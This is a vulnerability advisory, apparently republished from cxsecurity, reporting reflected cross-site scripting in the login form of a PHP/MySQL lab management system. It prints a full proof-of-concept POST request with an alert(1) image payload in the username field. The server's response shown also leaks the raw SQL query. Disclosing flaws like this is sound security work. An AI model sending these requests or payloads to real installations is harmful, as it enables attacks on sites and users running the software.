2024-10-5 22:36:4 Author: cxsecurity.com(查看原文) 阅读量:4 收藏
LMS2024-1.0 XSS-Reflected Information Disclosure
## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure ## Author: nu11secur1ty ## Date: 00/04/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the username request parameter is copied into the HTML document as plain text between tags. The payload ro2iz<img src=a onerror=alert(1)>xggkt was submitted in the username parameter. This input was echoed unmodified in the application's response. STATUS: HIGH- Vulnerability [+]Exploits: - XSS-Reflected: ```xss POST /php-lms/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml Origin: https://pwnedhost.com X-Requested-With: XMLHttpRequest Referer: https://pwnedhost.com/php-lms/admin/login.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 37 username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7 ``` + [Response] ``` HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:27:39 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 177 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"incorrect","last_qry":"SELECT * from users where username = 'VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password = md5('45ec487cfe5b3bac8e61740ae8dbcd06') "} ``` ## Reproduce: [href](https://www.patreon.com/nu11secur1ty) ## Demo PoC: [href](https://www.patreon.com/nu11secur1ty) ## Time spent: 00:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh